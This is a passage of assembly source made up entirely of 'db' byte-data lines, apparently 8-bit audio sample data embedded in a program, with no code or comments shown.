04Ch,06Bh,08Ch,01Ah,08Fh,078h,092h,087h,0CFh,0E8h,06Fh,0A0h,000h db 0A5h,01Ch,007h,069h,073h,0B0h,07Fh,0FFh,068h,0D1h,028h,067h,070h db 009h,09Bh,05Ch,0BFh,06Ch,0DFh,0A0h,09Fh,080h,01Bh,0A0h,020h,077h db 082h,08Bh,0A8h,0A7h,0F0h,077h,0C8h,011h,0BAh,044h,033h,0B0h,069h db 0B2h,08Eh,0FFh,068h,0DAh,018h,06Fh,060h,00Dh,0BAh,053h,0AFh,06Eh db 0D7h,0B0h,07Fh,080h,00Ah,0B2h,020h,055h,080h,05Dh,098h,09Bh,0C0h db 07Fh,094h,009h,0AFh,032h,05Bh,080h,05Ah,093h,093h,0FFh,071h,0DCh db 030h,07Fh,080h,01Fh,0BBh,074h,0F2h,079h,0E7h,074h,0DFh,050h,03Fh db 0A2h,02Ch,0B7h,070h,06Dh,072h,0AFh,0F0h,05Ah,0A2h,000h,095h,032h db 01Fh,094h,06Bh,0E0h,054h,0F6h,059h,0E3h,048h,05Fh,0A0h,033h,0BFh db 074h,073h,070h,0E7h,0A0h,06Bh,074h,000h,0A1h,024h,027h,065h,08Dh db 097h,0BBh,0FFh,06Ah,0E2h,04Ah,07Fh,084h,003h,087h,04Fh,0CDh,075h db 0E5h,0B8h,09Dh,0A8h,019h,0C2h,048h,047h,0A0h,05Ch,071h,077h,0FFh db 068h,06Bh,074h,00Fh,0BBh,010h,077h,048h,087h,0A4h,087h,0FCh,07Dh db 0F0h,040h,0C7h,082h,047h,0B8h,04Ah,099h,05Eh,0DBh,082h,087h,058h db 000h,098h,020h,06Fh,072h,06Fh,0A8h,083h,0FFh,059h,0E5h,052h,067h db 0AAh,028h,0B9h,03Fh,0C6h,05Ch,0AFh,0C0h,087h,0A0h,00Eh,0BBh,04Ah db 08Fh,080h,03Fh,078h,064h,0FFh,068h,093h,068h,01Fh,0B6h,020h,092h db 04Bh,0B7h,08Ah,095h,0D8h,08Bh,0C0h,021h,0C7h,06Ah,07Fh,09Ch,067h db 085h,04Eh,0FFh,070h,09Fh,050h,000h,0ADh,021h,08Fh,058h,0BFh,084h db 075h,0E0h,06Fh,0D0h,014h,0ABh,074h,077h,0B8h,046h,096h,056h,0EFh db 098h,07Fh,098h,000h,0A3h,038h,05Fh,070h,06Fh,0A4h,04Bh,0E4h,054h db 0D9h,040h,06Fh,098h,05Dh,0C2h,051h,095h,054h,095h,0DCh,06Fh,0B8h db 000h,06Fh,068h,03Fh,0A0h,057h,0E0h,049h,0DDh,084h,0C7h,074h,025h db 0D8h,05Bh,0E6h,04Ch,08Fh,068h,03Fh,0E8h,04Ah,0CFh,032h,033h,0A0h db 039h,0C2h,040h,0D7h,05Ch,09Bh,0A0h,087h,098h,029h,0D5h,070h,09Fh db 082h,07Bh,084h,03Dh,0D5h,068h,0BDh,02Ch,01Bh,0A8h,040h,0BDh,054h db 0B3h,062h,04Fh,0D6h,064h,0D4h,039h,05Fh,098h,06Fh,0C8h,03Ah,0B1h db 04Eh,06Fh,0A4h,07Fh,0AAh,011h,097h,06Ah,09Bh,094h,049h,0C0h,045h db 0AFh,080h,09Dh,098h,022h,0BFh,062h,0BDh,065h,047h,0B0h,040h,0BFh db 070h,0ADh,070h,01Dh,0C9h,067h,089h,06Ch,07Fh,0D0h,060h,0BFh,072h db 09Bh,080h,000h,08Dh,052h,0ABh,064h,055h,0DAh,078h,0CBh,0A8h,0AFh db 080h,016h,09Fh,062h,0AFh,04Ch,03Dh,0C0h,062h,05Fh,0C8h,05Bh,0CEh db 024h,01Bh,084h,06Bh,08Ch,060h,0BFh,0A4h,09Dh,0FFh,060h,0BCh,01Ah db 000h,0B0h,066h,0CCh,054h,073h,0D8h,085h,09Bh,0C8h,055h,0C2h,020h db 001h,072h,056h,069h,07Ch,0AAh,0A8h,07Bh,0AFh,080h,087h,090h,018h db 065h,071h,065h,0C2h,095h,0DAh,0B1h,09Ch,0C5h,08Ah,07Bh,080h,03Dh db 044h,051h,05Fh,06Ah,075h,089h,07Eh,082h,083h,080h,06Eh,064h,062h db 066h,075h,083h,08Bh,0A2h,0A6h,0A9h,0BAh,08Bh,091h,076h,07Bh,07Eh db 069h,07Bh,064h,06Dh,080h,075h,079h,06Ah,077h,07Ah,071h,078h,06Fh db 082h,07Ah,083h,090h,088h,07Ch,07Dh,088h,085h,089h,08Ah,085h,083h db 091h,086h,089h,085h,079h,07Fh,07Bh,083h,07Eh,077h,078h,083h,07Fh db 082h,08Bh,076h,079h,075h,07Fh,090h,074h,079h,075h,077h,072h,085h db 084h,076h,07Eh,074h,07Dh,07Eh,07Ah,080h,080h,07Fh,077h,07Eh,07Ah db 080h,080h,07Fh,088h,07Ch,084h,07Fh,07Fh,080h,081h,07Eh,079h,08Ah db 087h,086h,083h,08Dh,086h,07Ch,08Ch,07Ah,07Bh,073h,087h,098h,082h db 083h,07Dh,083h,07Ch,075h,083h,06Dh,077h,073h,085h,085h,072h,07Ch db 077h,082h,07Ah,07Ch,075h,06Bh,06Ch,073h,082h,073h,075h,07Eh,074h db 081h,087h,08Dh,088h,080h,075h,07Fh,08Dh,083h,097h,084h,081h,083h db 085h,080h,078h,07Dh,078h,07Fh,082h,087h,08Ch,078h,082h,081h,086h db 082h,07Dh,081h,07Bh,074h,078h,084h,078h,084h,080h,07Eh,079h,075h db 079h,072h,081h,07Dh,08Bh,07Eh,07Bh,086h,082h,086h,07Fh,07Eh,077h db 076h,084h,07Eh,080h,074h,077h,07Fh,090h,08Ch,085h,07Ah,062h,06Ah db 080h,08Ch,08Dh,07Eh,072h,07Bh,082h,089h,095h,08Ah,06Fh,07Ah,083h db 082h,083h,07Bh,077h,07Ah,079h,082h,07Dh,06Eh,077h,06Eh,082h,07Eh db 088h,07Dh,07Fh,078h,071h,081h,075h,07Ch,086h,07Fh,086h,07Eh,085h db 081h,086h,087h,08Dh,08Ah,076h,07Ah,07Ah,086h,085h,08Ah,086h,085h db 07Dh,077h,078h,06Eh,07Fh,07Ah,07Dh,07Eh,074h,083h,079h,088h,07Ah db 084h,078h,073h,081h,079h,086h,083h,081h,07Fh,082h,094h,080h,080h db 06Eh,069h,07Ch,078h,07Eh,07Bh,07Ch,072h,086h,090h,086h,07Dh,079h db 07Eh,084h,08Bh,07Eh,080h,080h,072h,090h,088h,07Ch,079h,076h,07Bh db 07Fh,086h,07Ah,081h,07Dh,07Dh,08Ah,07Ah,080h,070h,075h,07Eh,079h db 085h,073h,076h,075h,087h,087h,088h,084h,07Ch,07Ah,076h,077h,07Bh db 079h,083h,07Bh,081h,07Dh,07Ch,07Fh,080h,081h,07Fh,08Ah,082h,082h db 08Ch,082h,086h,086h,08Ah,083h,080h,071h,073h,07Fh,077h,084h,087h db 081h,07Bh,07Fh,07Fh,087h,086h,079h,083h,077h,087h,07Ch,07Ch,07Ch db 075h,082h,071h,076h,07Ch,076h,079h,079h,082h,070h,080h,07Ah,081h db 087h,084h,07Ah,070h,07Dh,06Fh,082h,084h,07Eh,081h,07Bh,07Dh,07Fh db 08Fh,07Dh,07Ch,084h,07Eh,07Bh,086h,088h,07Eh,08Fh,089h,075h,08Ah db 07Dh,079h,07Dh,080h,079h,07Fh,086h,077h,078h,07Dh,06Eh,08Dh,07Fh db 074h,076h,07Eh,078h,078h,08Dh,079h,07Eh,082h,07Eh,080h,087h,079h db 076h,082h,074h,07Eh,081h,06Eh,074h,081h,082h,081h,092h,07Bh,07Fh db 08Fh,08Ah,08Bh,07Ch,070h,074h,08Fh,07Eh,084h,084h,06Fh,075h,07Ah db 08Eh,07Bh,07Ch,078h,078h,083h,086h,08Eh,07Eh,082h,070h,07Dh,08Dh db 078h,07Bh,06Fh,077h,076h,087h,085h,074h,079h,077h,07Dh,085h,084h db 06Bh,07Eh,07Eh,077h,086h,088h,079h,07Dh,091h,07Bh,081h,09Bh,073h db 080h,07Bh,07Bh,090h,084h,070h,07Bh,08Ah,078h,07Fh,081h,071h,07Fh db 082h,080h,074h,081h,07Bh,06Dh,07Fh,070h,078h,089h,07Ch,077h,089h db 08Ah,07Fh,086h,07Eh,072h,081h,073h,068h,07Fh,082h,073h,085h,08Ah db 086h,09Eh,093h,07Bh,081h,086h,069h,07Dh,086h,06Ch,07Fh,088h,088h db 08Fh,09Ch,08Ch,079h,086h,074h,067h,06Dh,064h,069h,077h,07Fh,084h db 09Fh,085h,08Dh,09Bh,074h,071h,06Ch,05Dh,062h,07Dh,06Dh,073h,086h db 090h,091h,097h,092h,07Ah,079h,07Ch,061h,06Dh,076h,073h,070h,088h db 090h,094h,09Bh,09Bh,094h,078h,077h,078h,060h,05Dh,069h,07Bh,087h db 090h,09Fh,09Dh,09Fh,0A1h,080h,076h,068h,053h,04Bh,066h,072h,072h db 086h,099h,097h,0A2h,0ADh,082h,06Ah,064h,05Ah,053h,061h,06Ah,067h db 08Ah,0ABh,0ADh,0ACh,09Bh,0A5h,060h,067h,066h,059h,056h,06Fh,093h db 08Fh,0BFh,0A8h,08Eh,0AFh,0AAh,044h,04Fh,070h,041h,057h,08Dh,084h db 07Dh,0D1h,094h,07Eh,0BEh,088h,02Dh,06Ah,070h,038h,07Bh,0ABh,063h db 0AFh,0A0h,068h,075h,0CDh,064h,013h,087h,068h,02Fh,0ABh,0B4h,037h db 097h,0E0h,050h,097h,0F8h,022h,063h,0D4h,02Ah,07Dh,0E6h,038h,02Fh db 0F9h,080h,047h,0E7h,0DAh,010h,07Fh,084h,034h,0B7h,0B0h,01Dh,035h db 0D7h,0C0h,04Fh,0A1h,0B2h,002h,06Fh,0DEh,014h,087h,040h,001h,077h db 0FFh,0A0h,032h,0BDh,0E2h,05Bh,0D7h,0C0h,000h,095h,02Ah,000h,0A7h db 0C8h,02Ch,057h,0AEh,0C4h,09Fh,0E2h,030h,03Bh,0DCh,04Ah,02Fh,0FCh db 084h,03Ah,0A5h,0D3h,094h,0BBh,0D8h,020h,07Fh,0A0h,018h,033h,0FFh db 06Ch,009h,0A7h,0E2h,03Ah,0AFh,08Ah,000h,087h,068h,020h,09Fh,0D0h db 040h,05Bh,0FFh,088h,03Fh,0D5h,01Ch,027h,0A0h,036h,04Fh,0FFh,0A8h db 042h,0EFh,0D0h,05Eh,0F3h,0A0h,000h,05Bh,045h,03Dh,0F5h,0B4h,01Eh db 057h,0FFh,060h,087h,0DCh,000h,007h,084h,04Ch,07Dh,0FFh,071h,02Dh db 0FFh,0C4h,037h,0CFh,064h,000h,06Fh,038h,03Dh,0FFh,0C0h,034h,09Bh db 0FFh,054h,0A3h,0C2h,000h,05Fh,050h,01Ah,09Fh,0FFh,050h,03Fh,0FFh db 08Ch,073h,0F7h,034h,000h,07Ah,048h,073h,0FFh,080h,029h,0EFh,0D8h db 02Eh,0ABh,068h,000h,08Dh,036h,028h,0F3h,0D8h,044h,08Fh,0FFh,04Ah db 0AFh,0DAh,000h,02Bh,030h,03Fh,0D3h,0E8h,05Ah,07Fh,0FFh,068h,097h db 0E2h,000h,00Bh,021h,03Fh,0A7h,0FFh,06Ch,063h,0FFh,078h,073h,0DFh db 050h,000h,000h,04Dh,09Fh,0FFh,082h,033h,0E7h,0C0h,059h,0AFh,098h db 000h,02Bh,03Fh,062h,0F1h,0A6h,073h,0DFh,0FFh,040h,08Bh,0D0h,000h db 000h,017h,05Fh,0FDh,0FFh,058h,08Fh,0FFh,06Dh,0B7h,0ECh,008h,000h db 027h,07Bh,0C6h,0D2h,075h,097h,0FFh,060h,076h,0C8h,018h,000h,000h db 065h,0AFh,0FFh,096h,073h,0FFh,088h,07Fh,0DAh,040h,000h,000h,07Bh db 09Fh,0E0h,082h,069h,0FFh,0D4h,05Fh,066h,080h,000h,027h,049h,062h db 09Dh,0AAh,099h,0FFh,0F8h,038h,096h,0D4h,000h,000h,027h,077h,0FFh db 0FCh,068h,09Fh,0FFh,065h,0AFh,0D8h,000h,000h,02Fh,09Ah,07Fh,088h db 06Dh,0CFh,0FFh,062h,06Dh,0B1h,028h,000h,019h,065h,0BFh,0F4h,062h db 08Bh,0FFh,084h,077h,0EBh,054h,000h,000h,05Dh,0AFh,0FFh,08Ah,057h db 0FFh,068h,069h,0ABh,084h,000h,000h,065h,099h,0FFh,09Ch,05Bh,0EFh db 0E4h,09Dh,093h,09Ah,000h,000h,07Fh,093h,08Eh,089h,06Ch,0E5h,0FFh db 05Dh,074h,0CFh,038h,000h,023h,079h,09Bh,0DEh,091h,0AFh,0FFh,05Ch db 073h,0A7h,084h,000h,000h,046h,09Fh,0FFh,080h,053h,0DFh,0E4h,077h db 08Ah,0B8h,000h,000h,06Bh,089h,0A4h,084h,085h,0BFh,0FFh,050h,02Bh db 0C7h,068h,000h,00Fh,055h,0B5h,0FFh,0D0h,014h,0CFh,084h,059h,0DDh db 0C0h,000h,000h,08Fh,0B6h,0CBh,09Ah,050h,0D7h,0FFh,026h,055h,0A2h db 008h,000h,03Bh,06Ch,08Ah,0D3h,094h,083h,0FFh,082h,091h,0E7h,060h db 000h,00Ch,095h,082h,09Ch,0B3h,07Ah,0E7h,0FEh,028h,059h,0D7h,058h db 000h,001h,03Fh,0BFh,0FFh,078h,063h,0FFh,086h,0B3h,0FFh,040h,000h db 000h,06Dh,08Fh,0D9h,0A1h,060h,0B3h,0D2h,0C7h,074h,048h,000h,045h db 04Bh,03Bh,097h,0B8h,0A2h,0D3h,0FFh,064h,071h,0CEh,004h,00Bh,01Bh db 052h,07Bh,0C1h,0F6h,0A4h,0C5h,0C0h,065h,072h,0C6h,000h,000h,00Ah db 03Fh,0DFh,0FFh,058h,06Bh,0FAh,044h,0A7h,0FFh,028h,000h,03Bh,0BDh db 0FAh,0FFh,088h,07Bh,0FFh,058h,062h,057h,060h,000h,000h,043h,08Bh db 0FFh,098h,06Ah,0E7h,0D0h,062h,08Ah,0B0h,000h,005h,05Fh,0B5h,0B2h db 0A4h,072h,0D7h,0FFh,038h,087h,088h,01Ch,027h,053h,06Ah,09Dh,0FFh db 070h,075h,0FDh,048h,063h,0C5h,080h,000h,015h,06Bh,0B7h,0FFh,084h db 048h,0A7h,0E0h,061h,0B3h,088h,000h,031h,03Eh,062h,09Bh,0ECh,058h db 05Bh,0FFh,054h,06Bh,0B5h,0A0h,000h,000h,061h,091h,0FFh,090h,043h db 0EFh,0B8h,09Ah,09Fh,0A8h,000h,027h,031h,05Bh,09Ch,0BAh,0B0h,0BFh db 0F5h,04Ah,07Fh,0E5h,042h,000h,000h,056h,0BBh,0FFh,090h,03Fh,0FFh db 090h,0BFh,0D7h,094h,000h,000h,05Fh,08Eh,0FFh,080h,04Eh,0A5h,0D8h db 07Fh,064h,094h,000h,000h,03Bh,088h,074h,068h,0BFh,0FBh,0FFh,04Ah db 05Fh,0A5h,092h,015h,000h,01Fh,07Bh,0FFh,0FFh,052h,0DFh,050h,09Fh db 0D3h,0C0h,000h,000h,053h,08Dh,0FFh,098h,036h,087h,0D4h,08Bh,06Dh db 0B4h,000h,000h,035h,07Dh,0CBh,0F8h,0BAh,074h,0FFh,078h,075h,09Ah db 050h,000h,000h,0AEh,082h,073h,0A6h,0B0h,0FFh,0C8h,03Bh,052h,099h db 032h,000h,023h,044h,07Fh,0FFh,0FFh,058h,087h,046h,07Bh,0F3h,0CAh db 000h,000h,05Fh,0CAh,0FFh,0FEh,024h,077h,0B8h,039h,076h,0B4h,00Eh db 000h,02Bh,08Eh,0ABh,0FFh,070h,063h,0FFh,080h,09Ch,0BBh,054h,000h db 00Fh,06Ah,0A5h,0D6h,09Ah,099h,0DDh,0D4h,056h,067h,094h,000h,000h db 01Dh,066h,0BBh,0FFh,070h,067h,0D0h,06Fh,096h,0DEh,048h,000h,036h db 06Fh,09Ah,0FFh,070h,027h,0C9h,056h,06Ch,08Fh,084h,000h,023h,057h db 086h,0FFh,0F4h,080h,04Fh,0F5h,06Eh,082h,0C9h,020h,000h,003h,05Bh db 099h,0FFh,0C0h,03Ch,0EBh,080h,08Fh,09Dh,0A8h,006h,00Eh,056h,077h db 0DFh,0FFh,060h,07Fh,0B0h,06Eh,062h,0CEh,01Ah,017h,047h,05Dh,085h db 0FFh,0FFh,040h,097h,05Ah,05Eh,06Fh,0B4h,000h,037h,050h,07Fh,0ABh db 0FFh,0D8h,000h,0A7h,040h,047h,07Fh,08Ch,01Ch,023h,06Dh,080h,0C7h db 0FFh,080h,019h,0D2h,030h,056h,09Fh,070h,018h,02Dh,086h,0A8h,0FFh db 0FFh,070h,08Fh,0A0h,03Ch,018h,09Fh,070h,00Ah,053h,095h,099h,0FFh db 0FFh,044h,08Bh,088h,02Dh,00Fh,0ADh,044h,006h,067h,0A2h,085h,0EBh db 0FFh,030h,04Fh,094h,013h,000h,0BBh,035h,037h,083h,08Ch,093h,0FFh db 0FFh,040h,06Dh,0A8h,023h,027h,0AFh,034h,047h,072h,092h,07Fh,0EBh db 0FFh,054h,04Bh,0C0h,039h,044h,09Dh,054h,055h,075h,0C6h,084h,096h db 0FFh,0A0h,033h,0BFh,04Ch,02Ch,056h,08Ah,055h,087h,0B3h,062h,051h db 0C7h,0DCh,02Eh,08Fh,094h,020h,02Ah,07Dh,06Eh,0BDh,0ACh,06Ch,04Ch db 0A3h,0FFh,080h,03Eh,0B3h,030h,02Ah,04Dh,08Eh,04Dh,095h,0A3h,06Ch db 057h,0AFh,0FFh,060h,05Bh,0D5h,032h,04Fh,06Fh,064h,05Eh,0CDh,0A0h db 03Ah,06Fh,0CDh,0C0h,04Ah,082h,0DBh,02Ch,06Dh,04Bh,04Eh,087h,0B8h db 06Bh,058h,07Fh,09Eh,0CCh,072h,073h,0D5h,030h,06Fh,067h,048h,05Bh db 0BAh,09Ch,058h,07Dh,099h,0D4h,094h,06Ch,0C3h,04Ch,079h,03Eh,025h db 06Bh,0D4h,078h,072h,07Bh,07Ah,0BBh,0C1h,04Ah,08Bh,088h,02Bh,058h db 034h,046h,0DDh,09Ah,080h,072h,06Ch,08Fh,0FFh,070h,013h,0B1h,030h db 086h,055h,05Fh,0C7h,0B4h,082h,075h,087h,08Dh,0FFh,078h,000h,0A7h db 058h,07Bh,070h,03Ah,05Bh,0BCh,08Eh,0A8h,0ACh,034h,08Fh,0D8h,028h db 05Bh,0E0h,028h,07Fh,059h,029h,0ABh,0CCh,064h,06Bh,080h,049h,0AFh db 0D0h,023h,07Fh,0B0h,00Eh,089h,061h,02Fh,0B7h,0B2h,070h,092h,088h db 06Fh,0EFh,090h,023h,09Bh,0B4h,035h,08Ch,03Dh,03Fh,0D3h,094h,08Bh db 0C7h,060h,03Bh,0B9h,082h,069h,0CFh,0A0h,027h,084h,02Ah,04Bh,0EFh db 08Ch,07Eh,08Ch,050h,05Fh,0E3h,079h,04Fh,0AFh,078h,01Bh,081h,02Ch db 03Dh,0D3h,078h,077h,0B3h,066h,055h,0BFh,082h,069h,0B2h,0A8h,025h db 08Ah,035h,043h,0D3h,09Ch,07Bh,09Bh,05Ah,03Dh,0AFh,0C6h,07Fh,077h db 07Fh,062h,06Ah,096h,05Dh,073h,0AAh,06Ah,08Ch,08Ah,054h,04Fh,08Eh db 0AAh,07Bh,06Fh,09Ch,070h,05Dh,084h,056h,07Fh,0C5h,085h,073h,060h db 05Ah,071h,0C3h,0A8h,050h,056h,064h,071h,087h,0ACh,04Bh,071h,088h db 074h,0A4h,08Bh,085h,069h,072h,0A9h,090h,067h,07Ch,0A8h,038h,07Fh db 088h,05Bh,07Fh,0A5h,06Ah,073h,0B9h,05Bh,056h,0B2h,05Ah,042h,0A2h db 0CCh,044h,037h,079h,055h,073h,0E2h,0A5h,06Bh,091h,062h,056h,0B7h db 0ACh,051h,05Fh,0A1h,090h,02Eh,0A3h,07Eh,045h,09Fh,0A2h,07Ch,095h db 08Ah,070h,067h,0AEh,074h,055h,0A7h,0DBh,018h,033h,066h,06Ch,07Bh db 0C3h,090h,049h,07Dh,093h,076h,0B3h,0B0h,041h,046h,0A3h,08Dh,02Ah db 08Fh,075h,046h,087h,0B2h,07Bh,07Eh,091h,06Eh,071h,09Fh,08Ah,069h db 070h,092h,08Ah,04Fh,096h,090h,056h,07Dh,090h,084h,07Dh,0A1h,086h db 066h,084h,08Bh,073h,081h,080h,084h,072h,089h,082h,06Bh,06Eh,07Fh db 080h,077h,079h,095h,091h,059h,059h,081h,070h,069h,08Bh,08Eh,088h db 059h,07Ch,06Dh,097h,083h,06Eh,07Fh,087h,093h,087h,078h,05Ch,078h db 098h,07Eh,077h,08Fh,097h,062h,067h,080h,066h,07Eh,0A1h,07Ah,07Dh db 089h,095h,078h,055h,073h,092h,08Ch,077h,07Dh,096h,092h,04Ah,05Fh db 06Eh,087h,092h,08Ch,082h,085h,092h,078h,058h,06Ch,092h,073h,073h db 086h,08Eh,07Fh,05Eh,04Ah,06Ch,073h,092h,0A0h,07Eh,090h,097h,08Bh db 073h,070h,078h,089h,089h,075h,079h,08Fh,08Eh,07Ah,040h,05Fh,07Ch db 086h,085h,0A2h,0A9h,084h,07Fh,075h,05Ch,073h,09Ch,076h,061h,07Fh db 079h,075h,092h,082h,031h,069h,086h,076h,09Fh,0B1h,07Eh,073h,092h db 06Bh,067h,097h,087h,074h,078h,07Ah,085h,099h,065h,067h,088h,054h db 069h,085h,084h,087h,0A3h,08Ch,078h,09Fh,086h,053h,067h,07Ch,068h db 075h,092h,078h,072h,07Ch,062h,07Dh,0AFh,090h,06Bh,07Ch,06Eh,068h db 08Fh,0A0h,078h,06Ah,072h,075h,08Dh,08Ch,07Eh,089h,072h,054h,072h db 08Bh,089h,07Fh,072h,06Bh,08Ah,0A2h,089h,08Fh,085h,066h,071h,093h db 088h,074h,078h,06Dh,070h,08Ah,088h,089h,08Dh,072h,06Bh,080h,078h db 079h,070h,069h,06Ch,07Ch,08Bh,082h,08Bh,078h,06Ah,087h,081h,07Eh db 08Eh,070h,05Fh,079h,085h,07Fh,087h,07Ah,05Fh,08Ah,0A4h,076h,079h db 080h,06Ah,069h,075h,07Eh,093h,0A5h,081h,072h,088h,088h,085h,090h db 078h,060h,071h,07Bh,07Fh,084h,07Ah,068h,07Ah,08Ch,07Fh,07Ah,070h db 068h,076h,07Ch,077h,093h,0A2h,080h,086h,07Dh,07Bh,083h,08Eh,068h db 064h,074h,06Eh,077h,097h,074h,068h,080h,080h,071h,08Bh,07Ch,059h db 079h,08Ah,074h,099h,09Ch,066h,07Fh,0A6h,07Fh,08Fh,0A0h,056h,06Dh db 0A2h,06Ch,07Dh,09Dh,060h,05Fh,098h,072h,063h,097h,088h,048h,07Dh db 085h,069h,0A3h,088h,04Eh,063h,09Fh,091h,077h,08Ch,074h,042h,085h db 09Ch,06Ch,095h,066h,051h,08Fh,0CFh,07Ah,073h,09Ah,080h,065h,097h db 080h,05Ah,081h,04Ch,04Ah,09Eh,09Ch,074h,07Fh,083h,086h,097h,09Ah db 069h,07Fh,08Ch,060h,06Fh,0A0h,077h,06Eh,08Ch,08Eh,07Dh,083h,083h db 064h,07Ah,074h,05Eh,079h,09Fh,07Ah,063h,083h,092h,069h,091h,088h db 052h,075h,070h,069h,08Fh,0A0h,06Bh,074h,0ABh,08Eh,062h,08Dh,066h db 063h,08Ah,071h,07Bh,0BBh,098h,068h,087h,0A4h,077h,097h,08Ch,044h db 056h,069h,071h,0A7h,094h,05Dh,05Eh,0A4h,07Ch,077h,08Eh,05Ch,04Dh db 07Eh,074h,07Bh,0ACh,078h,059h,0A3h,0A4h,060h,082h,084h,049h,075h db 081h,07Eh,0ADh,0A5h,071h,07Fh,0BAh,074h,071h,084h,04Ah,05Bh,073h db 071h,087h,0ADh,07Ch,062h,0ADh,093h,073h,097h,06Ah,03Fh,070h,077h db 07Bh,0B5h,088h,058h,08Bh,0A8h,061h,079h,080h,045h,06Eh,075h,071h db 09Bh,0B2h,072h,06Bh,0B0h,080h,078h,096h,061h,042h,05Fh,073h,08Dh db 0B4h,088h,068h,0A3h,096h,06Fh,08Dh,07Ch,04Ah,05Eh,06Ch,07Fh,0BBh db 0A0h,070h,08Fh,0B0h,07Eh,07Fh,08Ah,040h,030h,063h,086h,0AFh,0ACh db 066h,063h,0B3h,080h,07Ch,07Eh,04Ch,03Fh,059h,079h,096h,09Bh,084h db 077h,0ADh,090h,071h,085h,080h,03Eh,041h,073h,093h,0D3h,0B2h,076h db 091h,09Ah,083h,0A3h,090h,040h,038h,05Bh,08Ah,0A7h,088h,071h,086h db 090h,06Bh,07Eh,083h,052h,043h,057h,08Bh,0BBh,0C0h,080h,07Fh,0AAh db 068h,07Bh,094h,050h,030h,048h,076h,09Dh,0A6h,07Dh,072h,0A7h,07Ah db 069h,07Ah,07Dh,054h,065h,06Ch,085h,0A9h,0AAh,095h,0B2h,09Ch,059h db 089h,0A1h,04Ch,049h,060h,07Eh,0C3h,0C0h,080h,083h,0A9h,067h,07Bh db 08Dh,060h,03Ch,05Ah,085h,081h,07Eh,079h,08Dh,0B3h,060h,05Bh,07Bh db 064h,03Dh,053h,06Ch,093h,0B5h,090h,08Ah,0BBh,07Ah,06Fh,08Fh,076h db 046h,05Fh,070h,087h,0B3h,08Ch,07Ch,0AEh,078h,059h,085h,07Eh,048h db 050h,07Bh,09Dh,0C1h,0A1h,08Fh,09Fh,098h,073h,085h,07Ch,048h,055h db 07Ah,083h,083h,08Bh,08Bh,0A0h,0A8h,068h,06Fh,087h,05Eh,04Ah,061h db 083h,095h,0A1h,090h,08Fh,0A8h,068h,067h,07Fh,062h,03Ah,056h,06Eh db 097h,0B3h,087h,076h,09Fh,096h,06Ah,083h,080h,043h,056h,07Eh,088h db 087h,08Fh,090h,0ADh,0B4h,060h,066h,08Dh,06Dh,044h,05Ch,075h,096h db 0CAh,08Ch,063h,098h,071h,079h,087h,078h,044h,04Bh,083h,097h,09Bh db 08Ah,07Ch,09Eh,0ACh,061h,05Fh,07Fh,062h,04Ah,067h,08Ah,095h,0BBh db 098h,08Ch,0BDh,084h,085h,091h,06Ch,045h,059h,085h,08Bh,095h,08Bh db 083h,0A4h,08Ch,04Dh,06Ah,08Bh,060h,048h,05Eh,07Fh,0ADh,0CCh,07Ch db 068h,09Ch,064h,083h,089h,054h,036h,04Fh,07Dh,096h,0AFh,088h,072h db 086h,0A0h,08Bh,074h,05Bh,04Dh,073h,078h,087h,09Eh,09Dh,092h,0A5h db 0BCh,076h,07Bh,085h,059h,055h,06Ch,081h,093h,0A7h,0A1h,07Bh,07Ch db 084h,06Dh,07Ch,07Bh,042h,039h,057h,07Dh,0C5h,0ACh,05Ah,071h,092h db 06Ah,08Ah,09Fh,061h,046h,06Eh,099h,0BBh,0ABh,076h,073h,0A4h,068h db 069h,06Fh,061h,036h,04Dh,07Bh,09Fh,0D1h,0A2h,081h,0B2h,098h,07Eh db 093h,086h,04Bh,04Dh,077h,08Dh,0A7h,092h,07Ah,09Dh,0A0h,057h,072h db 07Ah,05Ch,063h,065h,06Fh,09Fh,0CDh,08Dh,074h,09Ch,060h,063h,089h db 070h,035h,046h,070h,095h,0C6h,090h,061h,085h,094h,06Ah,07Fh,07Eh db 04Ah,05Ch,066h,076h,0A5h,0BAh,090h,087h,0BAh,082h,07Eh,095h,086h db 04Ch,054h,07Dh,09Eh,0C9h,0A0h,06Ch,093h,086h,065h,073h,078h,03Dh db 058h,065h,06Fh,08Ah,0AAh,090h,094h,0A1h,055h,062h,08Bh,068h,03Eh db 04Ch,06Ch,09Bh,0D8h,090h,06Eh,0ACh,086h,07Dh,092h,076h,044h,052h db 073h,089h,0B9h,096h,06Eh,08Dh,0A2h,065h,06Dh,084h,04Ah,05Dh,079h db 090h,085h,094h,0ADh,0BBh,0C4h,066h,062h,083h,08Eh,056h,054h,068h db 07Bh,0BFh,0BCh,070h,082h,063h,06Eh,08Dh,085h,040h,04Ah,069h,085h db 0BDh,090h,05Ch,075h,09Ah,073h,07Bh,088h,050h,053h,074h,087h,097h db 0ADh,08Eh,085h,0B3h,080h,073h,07Bh,076h,048h,059h,098h,092h,088h db 08Ch,099h,0B6h,0A8h,05Bh,064h,081h,05Ch,050h,058h,066h,085h,0BFh db 0A6h,072h,082h,057h,077h,0A5h,07Ch,04Dh,062h,07Bh,092h,0CAh,088h db 054h,095h,080h,069h,07Bh,080h,04Ch,059h,07Ah,092h,0B5h,0B0h,079h db 08Dh,09Ah,07Fh,07Fh,084h,057h,056h,076h,091h,09Fh,0A2h,088h,08Ah db 0A5h,06Ah,06Dh,075h,05Ch,049h,062h,079h,087h,0BEh,099h,066h,08Eh db 076h,07Eh,08Bh,074h,04Dh,05Bh,077h,089h,0AFh,0A0h,061h,07Bh,082h db 065h,077h,08Eh,068h,068h,073h,08Eh,0A6h,0CAh,08Dh,065h,087h,08Bh db 084h,076h,07Ch,054h,063h,075h,08Ah,0ADh,0B5h,078h,077h,093h,06Fh db 07Bh,086h,060h,05Dh,068h,07Ah,093h,0C5h,08Ch,055h,083h,069h,071h db 076h,072h,056h,05Ch,06Bh,081h,0ADh,0C4h,080h,067h,07Ah,061h,077h db 096h,07Ah,072h,06Dh,07Eh,095h,0C2h,0B8h,064h,06Fh,072h,069h,078h db 09Ah,078h,06Eh,073h,087h,0A7h,0CEh,098h,050h,07Eh,073h,074h,07Dh db 088h,062h,066h,07Fh,091h,09Fh,0C3h,080h,058h,07Eh,060h,065h,081h db 078h,057h,05Fh,088h,08Ch,0A0h,0B5h,076h,057h,070h,058h,070h,094h db 075h,05Ch,077h,09Ch,08Ah,0A3h,0B8h,068h,05Fh,08Ch,06Dh,06Ah,095h db 07Bh,06Bh,085h,093h,08Ah,0AFh,0B0h,064h,05Fh,08Fh,063h,069h,08Fh db 067h,063h,07Dh,08Ah,082h,0A9h,0A8h,05Eh,05Dh,08Ah,060h,06Ah,089h db 